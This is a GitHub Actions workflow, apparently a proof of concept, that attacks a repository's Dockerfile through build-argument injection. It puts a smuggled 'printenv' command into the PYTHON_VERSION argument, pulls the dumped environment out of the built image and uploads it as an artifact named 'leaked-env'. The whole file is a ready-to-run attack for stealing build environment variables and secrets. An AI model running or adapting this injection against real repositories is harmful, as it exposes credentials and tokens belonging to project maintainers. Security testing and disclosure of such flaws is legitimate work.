name: Leak Env Vars via Dockerfile Injection

on: [push]

jobs:
  leak:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v3

      - name: Inject into Dockerfile
        run: |
          docker build \
            --build-arg PYTHON_VERSION="3.11-alpine; printenv > /leak.txt" \
            -t leakimage \
            -f taskcluster/docker/python/Dockerfile .

      - name: Extract leak.txt from image
        run: |
          docker create --name temp leakimage
          docker cp temp:/leak.txt leak.txt || echo "No leak file"
          docker rm temp

      - name: Upload leaked env
        uses: actions/upload-artifact@v3
        with:
          name: leaked-env
          path: leak.txt
